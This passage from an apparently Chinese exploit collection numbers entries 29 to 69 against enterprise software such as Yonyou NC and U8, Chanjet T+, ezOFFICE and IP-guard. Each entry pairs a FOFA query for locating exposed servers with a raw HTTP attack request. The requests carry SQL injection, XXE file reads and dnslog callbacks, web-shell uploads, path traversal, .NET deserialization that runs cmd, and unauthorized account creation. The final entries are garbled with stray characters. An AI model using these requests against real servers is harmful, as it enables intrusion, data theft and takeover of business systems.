User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--


/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--


31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded


32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD


http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--


http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; the command it carries writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA: app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart管理平台 importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the path it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

( w, A" f6 A" a4 U6 ~69. 万户 ezOFFICE contract_gd.jsp SQL注入9 l7 ^4 P: r- }8 j! C. q  Q# I5 b, c% c
FOFA:app="万户ezOFFICE协同管理平台"6 J1 x6 l, F3 v
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
; G- S' {, ~: r: }! p: W. h" aHost: your-ip
